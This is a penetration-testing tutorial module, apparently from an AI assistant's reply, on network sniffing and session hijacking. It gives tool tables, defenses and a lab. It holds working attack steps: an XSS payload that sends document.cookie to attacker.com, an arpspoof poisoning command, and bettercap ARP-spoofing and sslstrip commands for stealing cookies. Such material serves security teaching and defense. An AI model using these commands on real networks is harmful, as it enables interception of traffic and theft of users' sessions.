Sniffing & Session Hijacking

Introduction

Sniffing and session hijacking are critical network attacks where an attacker intercepts and manipulates network traffic to steal sensitive data or take over authenticated sessions. This guide covers techniques, tools, and defenses.

1. Network Sniffing

What is Sniffing?

- Capturing and analyzing network traffic.

- Used for passive reconnaissance (e.g., stealing passwords, cookies).

- Works on unencrypted (HTTP, FTP, Telnet) and weakly encrypted protocols.

Types of Sniffing

1. Passive Sniffing 

   - Works on hubs (broadcast traffic).  

   - Attacker silently captures packets.  

2. Active Sniffing  

   - Works on switched networks (requires ARP spoofing).  

   - Techniques: ARP Poisoning, MAC Flooding, DNS Spoofing.  

Sniffing Tools

| Tool | Purpose |

|------|---------|

|   Wireshark  | GUI-based packet analyzer |

|    Tcpdump  | Command-line packet capture |

|     Ettercap   | MITM (Man-in-the-Middle) attacks |

|  BetterCAP  | Advanced MITM framework |

|      dsniff      | Password sniffing |

How to Perform Sniffing?

Step 1: Set Up Promiscuous Mode

bash

ifconfig eth0 promisc  # Enable promiscuous mode

Step 2: Capture Traffic with Wireshark

- Open Wireshark → Select interface → Start capture.

- Apply filters (e.g., http , ftp , tcp.port == 80`).

Step 3: Analyze Packets

- Look for plaintext passwords (HTTP, FTP).

- Extract cookies (`Cookie:` header in HTTP).

2. Session Hijacking

What is Session Hijacking?

- Stealing a valid session token (cookie, session ID) to impersonate a user.

- Common targets: Web apps, SSH, RDP, Telnet.

Types of Session Hijacking

|     Type         |        Method         |

|         ------     |          --------         |

|    Predictable Session Tokens     | Guessing weak session IDs |

|        Session Sidejacking      |      Sniffing unencrypted cookies |

|       Session Fixation   |       Forcing a victim to use attacker’s session ID |

|  Cross-Site Scripting (XSS)   | Stealing cookies via JavaScript |

| Man-in-the-Middle (MITM) | Intercepting and modifying traffic |

Session Hijacking Tools

| Tool  | Purpose |

|------|---------|

|    Burp Suite  | Intercepting & modifying HTTP sessions |

| ZAP (OWASP) | Web app session hijacking |

|        Ferret         |      Cookie hijacking tool |

|     Hamster       | Sidejacking tool (with Ferret) |

|      Ettercap      | MITM-based session hijacking |

How to Perform Session Hijacking?

Method 1: Cookie Theft via XSS

1. Inject malicious script:

  javascript

   document.location='http://attacker.com/steal.php?cookie='+document.cookie;

  2. Capture stolen cookie on attacker’s server (steal.php logs cookies).

Method 2: ARP Spoofing + Cookie Sniffing

1. ARP Poisoning (redirect traffic to attacker):

   bash

   arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

2. Use Wireshark or Ettercap to sniff cookies.

3. Modify browser cookies (Chrome DevTools → Application → Cookies).

Method 3: Session Fixation

1. Generate a fake session ID (PHPSESSID=attacker123).

2. Trick victim into using it (via phishing).

3. When victim logs in, attacker reuses the same session.

3. Defenses Against Sniffing & Hijacking

Preventing Sniffing

✔ Encrypt traffic (HTTPS, SSH, VPN).  

✔ Disable unused protocols (Telnet, FTP).  

✔ Use ARP spoofing detection (ARPWatch, XArp).  

✔ Network segmentation (VLANs, firewalls).  

Preventing Session Hijacking

✔ Use HTTPS (SSL/TLS) for all web traffic.  

✔ Secure cookies (HttpOnly ,  Secure ,  SameSite  flags).  

✔ Regenerate session IDs  after login.  

✔ Implement CSRF tokens .  

✔ Monitor abnormal logins (IP changes, multiple sessions).  

4. Hands-On Lab

Lab: Stealing Cookies with BetterCAP

1. Install BetterCAP:

   bash

   sudo apt install bettercap

2. Start ARP spoofing:

   bash

   sudo bettercap -iface eth0  

   > net.probe on

   > net.recon on

   > arp.spoof on

   

3. Sniff HTTP traffic:

   bash

   > set http.proxy.sslstrip true  

   > http.proxy on

  

4. Analyze stolen cookies in BetterCAP logs.

1. Search logs for Cookie: or Set-Cookie: headers.

2. Extract session tokens (e.g., PHPSESSID, JSESSIONID).

3. Check for missing security flags (Secure, HttpOnly).

4. Test cookie validity via curl or Burp Suite.

5. Recommend HTTPS, secure flags, and HSTS to prevent future theft.

Stolen cookies enable session hijacking if unprotected.

Conclusion

- Sniffing = Capturing unencrypted traffic.  

- Session Hijacking = Stealing active sessions.  

- Defenses = Encryption, secure cookies, monitoring.  

🔹 Next Steps: 

 Module 7: Web Application Hacking 

- Try HTTPS decryption (SSLstrip, mitmproxy).  

- Explore browser security (CSP, HSTS).  

- Practice on CTF challenges  (Hack The Box, TryHackMe).  

Would you like a step-by-step demo  on intercepting an SSH session? 🚀